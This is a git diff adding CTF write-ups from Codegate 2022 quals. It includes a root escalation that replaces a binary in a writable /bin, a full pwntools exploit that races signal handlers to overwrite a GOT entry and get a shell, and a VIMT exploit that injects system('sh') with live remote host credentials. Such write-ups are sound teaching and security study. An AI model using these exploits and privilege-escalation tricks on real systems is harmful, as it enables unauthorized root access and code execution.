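This kind of ownership mistake is easy to check for mechanically. As a minimal sketch (the helper name `writable_dirs` is made up for illustration and is not part of the challenge, and Python is probably not available inside the VM), the following lists every directory in a PATH-style string that the current user can modify. Under the permissions shown above, `/bin` would be one of them:

```python
import os


def writable_dirs(path_var):
    """Return the directories in a PATH-style string that the current user can modify."""
    hits = []
    for d in path_var.split(os.pathsep):
        # Write + search permission on a directory lets us create, delete
        # and rename entries in it, which is all we need to swap a binary.
        if d and os.path.isdir(d) and os.access(d, os.W_OK | os.X_OK):
            hits.append(d)
    return hits


if __name__ == "__main__":
    for d in writable_dirs(os.environ.get("PATH", "")):
        print("writable:", d)
```

Any hit that also contains a program run by root (here `umount` and `poweroff` from the init script) is a candidate for the same trick.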
+
+
+
+
+
+
+
diff --git a/Codegate-2022-quals/pwn/forgotten.md b/Codegate-2022-quals/pwn/forgotten.md
new file mode 100755
index 0000000..18f2aed
--- /dev/null
+++ b/Codegate-2022-quals/pwn/forgotten.md
@@ -0,0 +1,66 @@
+# Forgotten
+
+**Author**: [Nspace](https://twitter.com/_MatteoRizzo)
+
+**Tags:** pwn
+
+**Points:** 1000 (1 solve)
+
+**Description:**
+
+> i'm live in the wild.
+
+The challenge files contain a Linux VM (kernel image + initramfs) and a customized Qemu. The Qemu patch is included and adds a custom PCI device. The challenge also includes a driver (1153 lines of C) for the custom device, which is built into the kernel. The flag is in the initramfs, and can only be read by root.
+
+We have access to an unprivileged shell, and the intended solution is to become root by exploiting memory corruption in the custom driver.
+
+Fortunately for us there is also a much easier way to solve this challenge:
+
+```
+Initialization is done. Enjoy :)
+/ $ ls -la
+...
+drwxrwxr-x 2 user user 0 Nov 22 07:37 bin
+...
+```
+
+The `/bin` directory is owned by our user 👀. It appears that the author has... _forgotten_... to change the owner of some directories to root. That means that we can delete and create files there. At boot the VM executes the following init script as root:
+
+```sh
+#!/bin/sh
+
+mknod -m 0666 /dev/null c 1 3
+mknod -m 0660 /dev/ttyS0 c 4 64
+
+mount -t proc proc /proc
+mount -t sysfs sysfs /sys
+mount -t tmpfs tmpfs /tmp
+
+cat < /proc/sys/kernel/kptr_restrict
+
+mknod /dev/cgs-3d0 c 246 0
+setsid cttyhack setuidgid 1000 /bin/sh
+
+umount /proc
+umount /sys
+
+poweroff -f
+```
+
+The script invokes `umount` (`/bin/umount`) and `poweroff` (`/bin/poweroff`) as root after our unprivileged shell exits. Since we own `/bin`, we can simply delete `/bin/umount` and replace it with a script that prints the flag.
+
+```
+/ $ rm /bin/umount
+/ $ echo '#!/bin/sh' > /bin/umount
+/ $ echo 'cat /flag > /dev/ttyS0' >> /bin/umount
+/ $ chmod +x /bin/umount
+/ $ exit
+codegate2022{86776b92d17cd0dbceaf835d981a31f940c7f9e24613d4a261a2d38545218fc35b116036ea2989821248908e9984e0ee8272b3e85db10377f22e91adf990f73ff3c9c1a4e4c62784}
+codegate2022{86776b92d17cd0dbceaf835d981a31f940c7f9e24613d4a261a2d38545218fc35b116036ea2989821248908e9984e0ee8272b3e85db10377f22e91adf990f73ff3c9c1a4e4c62784}
+```
\ No newline at end of file
diff --git a/Codegate-2022-quals/pwn/isolated.html b/Codegate-2022-quals/pwn/isolated.html
new file mode 100755
index 0000000..6d0590c
--- /dev/null
+++ b/Codegate-2022-quals/pwn/isolated.html
@@ -0,0 +1,397 @@
+
+
+
+
+
+Isolated | Organisers
+
We’re provided a small executable that fork()s and sets up a server-client relationship, where the parent process acts as a server that receives instructions from the client. We can provide 0x300 bytes of custom instructions that will be run on the simple stack-based VM that the server and client implement together. The client and server share a memory mapping (with MAP_SHARED) that they use to communicate routine arguments and results.
+
+
The architecture
+
+
The server defines a few signal handlers that respectively push, pop and clean the stack, and one that enables “logging mode”. The logging mode makes all other signal handlers print some debug information before executing. The stack has defined bounds at stack_ptr = 0 and stack_ptr = 768, after which pop and push respectively will fail.
+
+
The client is tasked with decoding the provided instructions, and then sends a signal to the parent process to execute a signal handler. The signal handler then executes, and a variable in the shared memory is set to indicate the result. It should be noted that the following seccomp policy is applied to the child:
+
+
line CODE JT JF K
+=================================
+ 0000: 0x20 0x00 0x00 0x00000004 A = arch
+ 0001: 0x15 0x00 0x03 0xc000003e if (A != ARCH_X86_64) goto 0005
+ 0002: 0x20 0x00 0x00 0x00000000 A = sys_number
+ 0003: 0x15 0x00 0x01 0x0000003e if (A != kill) goto 0005
+ 0004: 0x06 0x00 0x00 0x7fff0000 return ALLOW
+ 0005: 0x06 0x00 0x00 0x00000001 return KILL
+
+
+
This hints that we should be exploiting the parent process.
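
To double-check that reading of the policy, here is a small sketch that interprets the six filter rows from the dump above. Only the three BPF opcodes that appear in the dump are handled, and the function names are my own; the constants are the standard Linux values for `AUDIT_ARCH_X86_64` and `SECCOMP_RET_ALLOW`.

```python
# Filter rows copied from the dump above: (code, jt, jf, k).
FILTER = [
    (0x20, 0, 0, 0x00000004),  # A = arch
    (0x15, 0, 3, 0xC000003E),  # if (A != ARCH_X86_64) goto 5
    (0x20, 0, 0, 0x00000000),  # A = sys_number
    (0x15, 0, 1, 0x0000003E),  # if (A != kill) goto 5
    (0x06, 0, 0, 0x7FFF0000),  # return ALLOW
    (0x06, 0, 0, 0x00000001),  # return KILL
]

AUDIT_ARCH_X86_64 = 0xC000003E
SECCOMP_RET_ALLOW = 0x7FFF0000


def run_filter(nr, arch=AUDIT_ARCH_X86_64):
    """Interpret FILTER for one syscall and return the raw return value."""
    # struct seccomp_data: syscall number at offset 0, arch at offset 4.
    data = {0: nr, 4: arch}
    acc, pc = 0, 0
    while True:
        code, jt, jf, k = FILTER[pc]
        if code == 0x20:    # BPF_LD | BPF_W | BPF_ABS
            acc = data[k]
            pc += 1
        elif code == 0x15:  # BPF_JMP | BPF_JEQ | BPF_K
            pc += 1 + (jt if acc == k else jf)
        elif code == 0x06:  # BPF_RET | BPF_K
            return k
        else:
            raise ValueError(f"opcode {code:#x} not handled in this sketch")


def is_allowed(nr, arch=AUDIT_ARCH_X86_64):
    return run_filter(nr, arch) == SECCOMP_RET_ALLOW
```

Only syscall 62 (`kill`) on x86-64 gets through, so the child can do nothing except signal other processes.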
+
+
There are a few defined instructions:
+
+
<0> <xx xx xx xx> pushes xx xx xx xx
+<1> pops (into the void)
+
+The next instructions can take either a 4-byte immediate or a value popped from the stack.
+A pop is denoted by <0x55> and an immediate is denoted by <0x66> <xx xx xx xx>. We'll call this a <imm/pop>
+
+<2> <imm/pop> <imm/pop> adds two operands and pushes the result
+<3> <imm/pop> <imm/pop> subtracts two operands and pushes the result
+<4> <imm/pop> <imm/pop> multiplies two operands and pushes the result
+<5> <imm/pop> <imm/pop> divides two operands and pushes the result
+<6> <imm/pop> <imm/pop> compares if the two operands are equal and sets a flag if this is the case.
+
+<7> <imm/pop> jumps to the operand
+<8> <imm/pop> jumps to the operand IF the flag is set (see 6)
+<9> cleans the stack
+<10> <imm/pop> sets log mode to the operand (any non-zero value is on)
+
+Anything else will kill parent and child immediately.
+
+
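
The encoding above is simple enough to sketch a disassembler for it. This is my own illustration rather than code from the challenge: the mnemonics are invented, and immediates are assumed to be little-endian, which matches the `p32` calls in the exploit below.

```python
import struct

# Mnemonics are invented for readability; the opcode numbers come from the table above.
NO_OPERAND = {1: "pop", 9: "clean"}
ONE_OPERAND = {7: "jmp", 8: "jmp_if", 10: "log"}
TWO_OPERANDS = {2: "add", 3: "sub", 4: "mul", 5: "div", 6: "cmp"}


def read_operand(code, i):
    """Decode one <imm/pop> operand starting at index i; return (text, next index)."""
    tag = code[i]
    if tag == 0x55:
        return "pop", i + 1
    if tag == 0x66:
        (value,) = struct.unpack_from("<I", code, i + 1)
        return f"imm({value:#x})", i + 5
    raise ValueError(f"bad operand tag {tag:#x} at offset {i}")


def disassemble(code):
    """Turn raw VM bytecode into a list of readable instruction strings."""
    out, i = [], 0
    while i < len(code):
        op = code[i]
        i += 1
        if op == 0:
            (value,) = struct.unpack_from("<I", code, i)
            out.append(f"push {value:#x}")
            i += 4
        elif op in NO_OPERAND:
            out.append(NO_OPERAND[op])
        elif op in ONE_OPERAND or op in TWO_OPERANDS:
            count = 1 if op in ONE_OPERAND else 2
            name = ONE_OPERAND.get(op) or TWO_OPERANDS[op]
            operands = []
            for _ in range(count):
                text, i = read_operand(code, i)
                operands.append(text)
            out.append(f"{name} {', '.join(operands)}")
        else:
            raise ValueError(f"unknown opcode {op} at offset {i - 1}")
    return out
```

Running it over a payload before sending makes it easier to see which instructions are blocking (everything with an `<imm/pop>` operand) and which are not (`push` and `pop`).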
+
The bug
+
+
All pops and pushes are blocking (they wait for the result), except the normal push and pop instructions <0> and <1>. Since these instructions don’t wait for the result, they can desynchronize the state. We can trigger a signal handler in the parent while another signal handler is already running, which is effectively a form of concurrency on a single execution core. We can use the resulting race condition to circumvent the bounds check for pop and push in the parent process.
+
+
The resulting exploit underflows the stack pointer to -1, at which point we can move the stack pointer to a GOT entry (I picked puts) and use the add instruction (<2>) to add a constant to its lower four bytes, turning it into the address of a one-shot gadget.
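
The arithmetic behind that last step can be sketched as follows. The libc base and the offset of puts are made-up values for illustration; only the one-gadget offset 0x4f432 comes from the exploit below. The trick works without a leak because only the difference between the two libc offsets is needed, as long as both addresses share the same upper 32 bits.

```python
MASK32 = 0xFFFFFFFF

# Hypothetical values, for illustration only.
LIBC_BASE = 0x7F1234500000
PUTS_OFFSET = 0x809C0
# One-gadget offset taken from the exploit script.
ONE_GADGET_OFFSET = 0x4F432


def patch_low32(got_value, delta):
    """Add delta to the low 32 bits of a 64-bit value, leaving the high half alone."""
    low = (got_value + delta) & MASK32
    return (got_value & ~MASK32) | low


# Constant pushed through the VM's add instruction: a negative difference
# wraps around to a large unsigned 32-bit number.
delta = (ONE_GADGET_OFFSET - PUTS_OFFSET) & MASK32

patched = patch_low32(LIBC_BASE + PUTS_OFFSET, delta)
print(hex(patched))
```

This is the same computation as `rel_og_offsets` combined with `add_constant` in the exploit.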
+
+
Winning the race was mostly a matter of trial and error. I combined pop with clean_stack, so that the stack pointer is zeroed but the pop routine still decrements it. In a local Docker container I was able to win the race about 25% of the time, but on the remote it was less than 1%.
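
The interleaving I was aiming for can be modelled deterministically. The sketch below is not the binary's code: it assumes the pop handler does a bounds check followed by a separate decrement, and uses a generator's `yield` to mark the point where a second signal can be delivered.

```python
class VM:
    def __init__(self, sp=0):
        self.sp = sp


def pop_handler(vm):
    """Assumed shape of the pop handler: check first, decrement later."""
    in_bounds = vm.sp > 0  # bounds check
    yield                  # another signal handler may run here
    if in_bounds:
        vm.sp -= 1         # decrement based on the now stale check


def clean_handler(vm):
    vm.sp = 0


def run_sequential(sp):
    """pop runs to completion, then clean_stack runs."""
    vm = VM(sp)
    for _ in pop_handler(vm):
        pass
    clean_handler(vm)
    return vm.sp


def run_interleaved(sp):
    """clean_stack interrupts pop between its check and its decrement."""
    vm = VM(sp)
    pop = pop_handler(vm)
    next(pop)          # pop passes the bounds check with sp > 0
    clean_handler(vm)  # clean_stack zeroes the stack pointer
    for _ in pop:      # pop resumes and decrements anyway
        pass
    return vm.sp
```

Starting from a stack pointer of 1, the sequential order ends at 0 while the interleaved order ends at -1, which is the underflow the exploit needs.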
+
+
The exploit
+
+
+from pwn import *
+from pwnlib.util.proc import descendants
+context.terminal = ["terminator", "-e"]
+
+BINARY_NAME = "./isolated"
+LIBC_NAME = "./libc.so"
+REMOTE = ("3.38.234.54", 7777)
+DOCKER_REMOTE = ("127.0.0.1", 7777)
+
+context.binary = BINARY_NAME
+binary = context.binary
+libc = ELF(LIBC_NAME)
+
+EXEC_STR = [binary.path]
+
+PIE_ENABLED = binary.pie
+
+BREAKPOINTS = [int(x, 16) for x in args.BREAK.split(',')] if args.BREAK else []
+
+gdbscript_break = '\n'.join([f"{'pie ' if PIE_ENABLED else ''}break *{hex(x)}" for x in BREAKPOINTS])
+
+gdbscript = \
+    """
+    set follow-fork-mode child
+    """
+
+
+def handle():
+
+    env = {"LD_PRELOAD": libc.path}
+
+    if args.REMOTE:
+        return remote(*REMOTE)
+
+    elif args.LOCAL:
+        p = process(EXEC_STR, env=env)
+    elif args.GDB:
+        p = gdb.debug(EXEC_STR, env=env, gdbscript=gdbscript_break + gdbscript)
+
+    elif args.DOCKER:
+        p = remote(*DOCKER_REMOTE)
+    else:
+        error("No argument supplied.\nUsage: python exploit.py (REMOTE|LOCAL) [GDB] [STRACE]")
+
+    if args.STRACE:
+        subprocess.Popen([*context.terminal, f"strace -p {p.pid}; cat"])
+        input("Waiting for enter...")
+
+    return p
+
+def main():
+    l = handle()
+    #print(l.pid)
+    """
+    <0> <xx xx xx xx> pushes xx xx xx xx
+    <1> pops (into the void)
+
+    The next instructions can take either a 4-byte immediate or a value popped from the stack.
+    A pop is denoted by <0x55> and an immediate is denoted by <0x66> <xx xx xx xx>. We'll call this a <imm/pop>
+
+    <2> <imm/pop> <imm/pop> adds two operands and pushes the result
+    <3> <imm/pop> <imm/pop> subtracts two operands and pushes the result
+    <4> <imm/pop> <imm/pop> multiplies two operands and pushes the result
+    <5> <imm/pop> <imm/pop> divides two operands and pushes the result
+    <6> <imm/pop> <imm/pop> compares if the two operands are equal and sets a flag if this is the case.
+
+    <7> <imm/pop> jumps to the operand
+    <8> <imm/pop> jumps to the operand IF the flag is set (see 6)
+    <9> cleans the stack
+    <10> <imm/pop> sets log mode to the operand (any non-zero value is on)
+
+    anything else kills the parent immediately
+    """
+
+    ONE_GADGETS = [
+        0x4f432,
+        0x10a41c
+    ]
+
+    rel_og_offsets = [og - libc.symbols['puts'] for og in ONE_GADGETS]
+    print(rel_og_offsets)
+
+    dbg = lambda x: [10, 0x66, *p32(x)]
+    pop = lambda: [1]
+    cmp_pop_blocking = lambda y: [6, 0x55, 0x66, *p32(y)] # compares the popped value with y and sets the flag if equal
+    push_blocking = lambda x: [2, 0x66, *p32(x), 0x66, *p32(0)] # adds x + 0 and pushes the result
+    jmp = lambda x: [7, 0x66, *p32(x)]
+    clean_stack = lambda: [9]
+    cmp_imm_imm = lambda: [6, 0x66, *p32(0x41414141), 0x66, *p32(0x41414142)]
+    add_constant = lambda x: [2, 0x66, *p32(x & 0xffffffff), 0x55]
+
+    payload = [*dbg(0x01)] # 6
+
+    start = len(payload)
+
+    offset = (0x203100 - binary.got['puts']) // 4
+    print(offset)
+
+    payload.extend([
+        *push_blocking(1),
+        *[*cmp_imm_imm() * 10],
+        *pop(), *pop(),
+        *clean_stack(),
+        *[*cmp_imm_imm() * 10],
+        *cmp_pop_blocking(0xffffffff),
+        *dbg(1),
+        *[*cmp_imm_imm() * 5],
+        *[*push_blocking(-offset & 0xffffffff) * 2],
+        *add_constant(rel_og_offsets[0]),
+        *dbg(1), # get shell!
+    ])
+
+
+    payload.extend(jmp(len(payload)))
+
+    print(len(payload))
+    payload = bytes(payload)
+    #print(hexdump(payload))
+    l.recvuntil(b"opcodes >")
+
+    l.send(payload)
+
+    print(f"puts @ {hex(libc.symbols['puts'])}")
+
+    time.sleep(3)
+    l.sendline("cat flag")
+
+    assert b"timeout" not in l.stream()
+
+if __name__ == "__main__":
+    main()
+
+
diff --git a/Codegate-2022-quals/pwn/isolated.md b/Codegate-2022-quals/pwn/isolated.md
new file mode 100755
index 0000000..1b9c369
--- /dev/null
+++ b/Codegate-2022-quals/pwn/isolated.md
@@ -0,0 +1,201 @@
+# Isolated
+
+**Author**: pql
+
+**Tags:** pwn
+
+**Points:** 884 (19 solves)
+
+**Description:**
+
+> Simple VM, But isloated.
+
+We're provided a small executable that `fork()`s and sets up a server-client relationship, where the parent process acts as a server that receives instructions from the client. We can provide `0x300` bytes of custom instructions that will be run on the simple stack-based VM that the server and client implement together. The client and server share a memory mapping (with `MAP_SHARED`) that they use to communicate routine arguments and results.
+
+#### The architecture
+
+
+
+The server defines a few signal handlers that respectively push, pop and clean the stack, and one that enables "logging mode". The logging mode makes all other signal handlers print some debug information before executing. The stack has defined bounds at `stack_ptr = 0` and `stack_ptr = 768`, after which `pop` and `push` respectively will fail.
+
+The client is tasked with decoding the provided instructions, and then sends a signal to the parent process to execute a signal handler. The signal handler then executes, and a variable in the shared memory is set to indicate the result. It should be noted that the following seccomp policy is applied to the child:
+
+```
+ line CODE JT JF K
+=================================
+ 0000: 0x20 0x00 0x00 0x00000004 A = arch
+ 0001: 0x15 0x00 0x03 0xc000003e if (A != ARCH_X86_64) goto 0005
+ 0002: 0x20 0x00 0x00 0x00000000 A = sys_number
+ 0003: 0x15 0x00 0x01 0x0000003e if (A != kill) goto 0005
+ 0004: 0x06 0x00 0x00 0x7fff0000 return ALLOW
+ 0005: 0x06 0x00 0x00 0x00000001 return KILL
+```
+
+This hints that we should be exploiting the parent process.
+
+There are a few defined instructions:
+
+```
+<0> <xx xx xx xx> pushes xx xx xx xx
+<1> pops (into the void)
+
+The next instructions can take either a 4-byte immediate or a value popped from the stack.
+A pop is denoted by <0x55> and an immediate is denoted by <0x66> <xx xx xx xx>. We'll call this a <imm/pop>
+
+<2> <imm/pop> <imm/pop> adds two operands and pushes the result
+<3> <imm/pop> <imm/pop> subtracts two operands and pushes the result
+<4> <imm/pop> <imm/pop> multiplies two operands and pushes the result
+<5> <imm/pop> <imm/pop> divides two operands and pushes the result
+<6> <imm/pop> <imm/pop> compares if the two operands are equal and sets a flag if this is the case.
+
+<7> <imm/pop> jumps to the operand
+<8> <imm/pop> jumps to the operand IF the flag is set (see 6)
+<9> cleans the stack
+<10> <imm/pop> sets log mode to the operand (any non-zero value is on)
+
+Anything else will kill parent and child immediately.
+```
+
+#### The bug
+
+All pops and pushes are *blocking* (they wait for the result), except the normal push and pop instructions `<0>` and `<1>`. Since these instructions don't wait for the result, they can desynchronize the state. We can trigger a signal handler in the parent while another signal handler is already running, which is effectively a form of concurrency on a single execution core. We can use the resulting race condition to circumvent the bounds check for `pop` and `push` in the parent process.
+
+The resulting exploit underflows the stack pointer to -1, at which point we can move the stack pointer to a GOT entry (I picked `puts`) and use the add instruction (`<2>`) to add a constant to its lower four bytes, turning it into the address of a one-shot gadget.
+
+Winning the race was mostly a matter of trial and error. I combined `pop` with `clean_stack`, so that the stack pointer is zeroed but the `pop` routine still decrements it. In a local Docker container I was able to win the race about 25% of the time, but on the remote it was less than 1%.
+
+#### The exploit
+
+```python
+from pwn import *
+from pwnlib.util.proc import descendants
+context.terminal = ["terminator", "-e"]
+
+BINARY_NAME = "./isolated"
+LIBC_NAME = "./libc.so"
+REMOTE = ("3.38.234.54", 7777)
+DOCKER_REMOTE = ("127.0.0.1", 7777)
+
+context.binary = BINARY_NAME
+binary = context.binary
+libc = ELF(LIBC_NAME)
+
+EXEC_STR = [binary.path]
+
+PIE_ENABLED = binary.pie
+
+BREAKPOINTS = [int(x, 16) for x in args.BREAK.split(',')] if args.BREAK else []
+
+gdbscript_break = '\n'.join([f"{'pie ' if PIE_ENABLED else ''}break *{hex(x)}" for x in BREAKPOINTS])
+
+gdbscript = \
+    """
+    set follow-fork-mode child
+    """
+
+
+def handle():
+
+    env = {"LD_PRELOAD": libc.path}
+
+    if args.REMOTE:
+        return remote(*REMOTE)
+
+    elif args.LOCAL:
+        p = process(EXEC_STR, env=env)
+    elif args.GDB:
+        p = gdb.debug(EXEC_STR, env=env, gdbscript=gdbscript_break + gdbscript)
+
+    elif args.DOCKER:
+        p = remote(*DOCKER_REMOTE)
+    else:
+        error("No argument supplied.\nUsage: python exploit.py (REMOTE|LOCAL) [GDB] [STRACE]")
+
+    if args.STRACE:
+        subprocess.Popen([*context.terminal, f"strace -p {p.pid}; cat"])
+        input("Waiting for enter...")
+
+    return p
+
+def main():
+    l = handle()
+    #print(l.pid)
+    """
+    <0> <xx xx xx xx> pushes xx xx xx xx
+    <1> pops (into the void)
+
+    The next instructions can take either a 4-byte immediate or a value popped from the stack.
+    A pop is denoted by <0x55> and an immediate is denoted by <0x66> <xx xx xx xx>. We'll call this a <imm/pop>
+
+    <2> <imm/pop> <imm/pop> adds two operands and pushes the result
+    <3> <imm/pop> <imm/pop> subtracts two operands and pushes the result
+    <4> <imm/pop> <imm/pop> multiplies two operands and pushes the result
+    <5> <imm/pop> <imm/pop> divides two operands and pushes the result
+    <6> <imm/pop> <imm/pop> compares if the two operands are equal and sets a flag if this is the case.
+
+    <7> <imm/pop> jumps to the operand
+    <8> <imm/pop> jumps to the operand IF the flag is set (see 6)
+    <9> cleans the stack
+    <10> <imm/pop> sets log mode to the operand (any non-zero value is on)
+
+    anything else kills the parent immediately
+    """
+
+    ONE_GADGETS = [
+        0x4f432,
+        0x10a41c
+    ]
+
+    rel_og_offsets = [og - libc.symbols['puts'] for og in ONE_GADGETS]
+    print(rel_og_offsets)
+
+    dbg = lambda x: [10, 0x66, *p32(x)]
+    pop = lambda: [1]
+    cmp_pop_blocking = lambda y: [6, 0x55, 0x66, *p32(y)] # compares the popped value with y and sets the flag if equal
+    push_blocking = lambda x: [2, 0x66, *p32(x), 0x66, *p32(0)] # adds x + 0 and pushes the result
+    jmp = lambda x: [7, 0x66, *p32(x)]
+    clean_stack = lambda: [9]
+    cmp_imm_imm = lambda: [6, 0x66, *p32(0x41414141), 0x66, *p32(0x41414142)]
+    add_constant = lambda x: [2, 0x66, *p32(x & 0xffffffff), 0x55]
+
+    payload = [*dbg(0x01)] # 6
+
+    start = len(payload)
+
+    offset = (0x203100 - binary.got['puts']) // 4
+    print(offset)
+
+    payload.extend([
+        *push_blocking(1),
+        *[*cmp_imm_imm() * 10],
+        *pop(), *pop(),
+        *clean_stack(),
+        *[*cmp_imm_imm() * 10],
+        *cmp_pop_blocking(0xffffffff),
+        *dbg(1),
+        *[*cmp_imm_imm() * 5],
+        *[*push_blocking(-offset & 0xffffffff) * 2],
+        *add_constant(rel_og_offsets[0]),
+        *dbg(1), # get shell!
+    ])
+
+
+    payload.extend(jmp(len(payload)))
+
+    print(len(payload))
+    payload = bytes(payload)
+    #print(hexdump(payload))
+    l.recvuntil(b"opcodes >")
+
+    l.send(payload)
+
+    print(f"puts @ {hex(libc.symbols['puts'])}")
+
+    time.sleep(3)
+    l.sendline("cat flag")
+
+    assert b"timeout" not in l.stream()
+
+if __name__ == "__main__":
+    main()
+```
diff --git a/Codegate-2022-quals/pwn/vimt.html b/Codegate-2022-quals/pwn/vimt.html
new file mode 100755
index 0000000..eb72543
--- /dev/null
+++ b/Codegate-2022-quals/pwn/vimt.html
@@ -0,0 +1,462 @@
+
+
+
+
+
+VIMT | Organisers
+
Although a somewhat unconventional setup (ssh’ing into the binary1), the binary itself is fairly simple and even comes with symbols. The basic functionality is as follows:
+
+
The binary creates a 2D map the size of your terminal. In a loop, it waits for you to enter a character. The character gets placed at the current position in the map, followed by 5 random characters. In addition, sending a \x1b character lets us execute a command. The interesting commands are:
+
+
+
compile: Compiles the current map as C code and executes the result.
+
set: Set the y coordinate of the current map position.
+
+
+
We also notice some interesting setup code in init:
+
+
v4=clock();
+v3=time(0LL);
+v0=getpid();
+v1=mix(v4,v3,v0);// some z3 looking combination of inputs.
+srand(v1);
+
+
+
To me it looked like the intended solution might have been to reverse the mix function and recover the random seed in order to predict which additional letters get added to the map. However, we can actually solve this without doing that.
+I noticed that with a prime terminal width we can also set the x coordinate. If we can set the x coordinate, we can of course create arbitrary map contents.
+
+
If our terminal has a width of 29 and every time we enter a character the x position moves by 6, we can do the following:
+
+
+
Enter 5 characters, now x position moves by 30 (with wrap around)
+
This means x position is now actually one after the original x position
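
The modular arithmetic behind these two steps can be sketched in a few lines. The function name is my own, and unlike the exploit script below (which always uses 5 presses per column) it searches for the smallest number of presses for a given shift:

```python
def presses_for_shift(width, step, shift):
    """Smallest number of key presses that moves x by `shift` columns (mod width).

    Each key press advances the cursor by `step` cells (1 typed + 5 random here).
    """
    shift %= width
    for presses in range(width):
        if (presses * step) % width == shift:
            return presses
    # Only happens when step and width share a factor, e.g. width 30 and step 6.
    raise ValueError("shift not reachable with this width")


if __name__ == "__main__":
    # Width 29, step 6: five presses move 30 cells, i.e. one column to the right.
    print(presses_for_shift(29, 6, 1))
```

What actually matters is that the width shares no factor with 6. A prime width such as 29 guarantees that, and 29 has the extra convenience that five presses give a shift of exactly one column.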
+
+
+
Since we can reset the y position to the original value, we can control the x position and hence write anything on the map. Since doing this on the server was very slow (for some reason) and I probably made a mistake in my Python code (more than one line would break it), we wanted a payload shorter than 29 characters. Luckily the following worked: main(){system("sh");}//.
+
+
Now the only thing left was fighting with pwntools, ssh and pseudoterminals (aka try random options until you get it to work) to actually have the correctly sized terminal on the remote. After that, it was just waiting around 20 minutes and then we got a shell. For some reason, I did not see any stdout of the remote terminal (except newlines maybe), so I had to exfil the flag with some bash magic.
+
+
The final exploit script:
+
+
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+# This exploit template was generated via:
+# $ pwn template app
+from pwn import *
+import random
+
+# Set up pwntools for the correct architecture
+exe = context.binary = ELF('app')
+
+
+def local(argv=[], *a, **kw):
+    '''Start the exploit against the target.'''
+    if args.GDB:
+        return gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw)
+    else:
+        return process([exe.path] + argv, stdin=PTY, raw=False, *a, **kw)
+
+def remote():
+    #return ssh("ctf", host="3.38.59.103", port=1234, password="ctf1234_smiley")
+    # stty cols 29 rows 12
+    p = process("sshpass -e ssh -tt ctf@3.38.59.103 -p 1234 'bash -i'", shell=True, env={"SSHPASS": "ctf1234_smiley"})
+    p.sendlineafter("~$ ", "stty cols 29 rows 12")
+    p.sendlineafter("~$ ", "./app")
+    return p
+
+def start(*a, **kw):
+    if args.LOCAL:
+        return local(*a, **kw)
+    return remote(*a, **kw)
+
+# Specify your GDB script here for debugging
+# GDB will be launched if the exploit is run via e.g.
+# ./exploit.py GDB
+gdbscript = '''
+tbreak main
+continue
+'''.format(**locals())
+
+#===========================================================
+# EXPLOIT GOES HERE
+#===========================================================
+# Arch: amd64-64-little
+# RELRO: Partial RELRO
+# Stack: No canary found
+# NX: NX enabled
+# PIE: No PIE (0x400000)
+
+#### remote comms
+WIDTH = 29
+HEIGHT = 10
+
+def read_mappa():
+    begin = io.recvuntil(b"-"*WIDTH)
+    read_map = io.recvuntil(b"-"*WIDTH)
+    log.debug("REMOTE MAP:\n%s", read_map.decode("utf8", errors="ignore"))
+    return begin + read_map
+
+def send_data(data):
+    if isinstance(data, str):
+        data = data.encode("utf8")
+    io.send(data)
+    return read_mappa()
+
+def send_command(cmd, read = True):
+    io.send(b"\x1b")
+    if isinstance(cmd, str):
+        cmd = cmd.encode("utf8")
+    io.sendline(cmd)
+    if read:
+        return read_mappa()
+    return None
+
+def do_compile():
+    return send_command("compile", False)
+
+def do_set_y(y_val):
+    return send_command(f"set y {y_val}")
+
+RAND_CHARS = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789{}!"
+
+log.info("Using terminal of size %d x %d", WIDTH, HEIGHT)
+
+mappa = []
+for y in range(HEIGHT):
+    row = ""
+    for x in range(WIDTH):
+        row += " "
+    mappa.append(row)
+
+cur_x = 0
+cur_y = 0
+
+def check_coords_up():
+    global cur_x, cur_y
+    if cur_x >= WIDTH:
+        cur_x = 0
+        cur_y += 1
+    if cur_y >= HEIGHT:
+        cur_y = HEIGHT - 1
+
+def set_car(car):
+    global mappa, cur_y, cur_x
+    row = mappa[cur_y]
+    mappa[cur_y] = row[:cur_x] + car + row[cur_x+1:]
+
+def inpKey(car):
+    global cur_x
+    rem_map = send_data(car)
+    check_coords_up()
+    set_car(car)
+    cur_x += 1
+    for i in range(5):
+        check_coords_up()
+        rand_car = random.choice(RAND_CHARS)
+        set_car(rand_car)
+        cur_x += 1
+    return rem_map
+
+def set_y(y_val):
+    global cur_y
+    do_set_y(y_val)
+    cur_y = y_val
+
+def set_x(x_val):
+    global cur_y, cur_x
+    if cur_x == x_val:
+        return
+    # this is more involved!
+
+    # number of times to enter a character for a row to be filled.
+    # every time we enter a character, we write 6 to the map!
+    min_to_fill = (WIDTH // 6) + 1
+    # number of characters the new x position on the next row will be offset
+    offset = min_to_fill * 6 - WIDTH
+    # we could actually use any offset, would just mean more math lol
+    assert offset == 1
+    # number of characters difference between desired and required x val
+    diff = (x_val - cur_x)
+    if diff < 0:
+        diff += WIDTH
+    num_inputs = (diff // offset) * min_to_fill
+    log.debug("Additional inputs: %d", num_inputs)
+    for k in range(num_inputs):
+        inpKey("G")
+    log.debug("cur_x %d vs x_val %d", cur_x, x_val)
+    assert cur_x == x_val
+
+
+def pmap():
+    log.info("MAP:\n%s", "\n".join(mappa))
+
+def write_line(y, s: str):
+    log.debug("Writing line %s @ y = %d", s, y)
+    for idx, car in enumerate(s):
+        set_x(idx)
+        set_y(y)
+        inpKey(car)
+    set_x(len(s))
+    set_y(y)
+    inpKey("\n")
+
+def write_str(start_x, start_y, s: str):
+    x = start_x
+    y = start_y
+    for idx, car in enumerate(s):
+
+        if x >= WIDTH:
+            x = 0
+            y += 1  # was `y=+1`, which resets y to 1 instead of advancing a row
+        if y >= HEIGHT:
+            log.error("FAILED TO WRITE STRING!")
+        log.info("Writing %s at %d, %d", car, x, y)
+        set_x(x)
+        set_y(y)
+        rem_map = inpKey(car)
+        if idx % 10:
+            log.info("remote map:\n%s", rem_map.decode("utf8", errors="ignore"))
+        x += 1
+
+log.info("Initial map:")
+pmap()
+
+io = start()
+# io.interactive()
+init_map = read_mappa()
+log.info("init remote map:\n%s", init_map.decode("utf8", errors="ignore"))
+
+PAYLOAD = """main(){system("sh");}//"""
+log.info("PAYLOAD:\n%s", PAYLOAD)
+
+write_str(0, 0, PAYLOAD)
+log.info("map with payload:")
+pmap()
+log.info("Writing map to file: test.c")
+with open("test.c", "w") as f:
+    f.write("".join(mappa))
+
+rem_map = send_data("$")
+log.info("Remote map:\n%s", rem_map.decode("utf8", errors="ignore"))
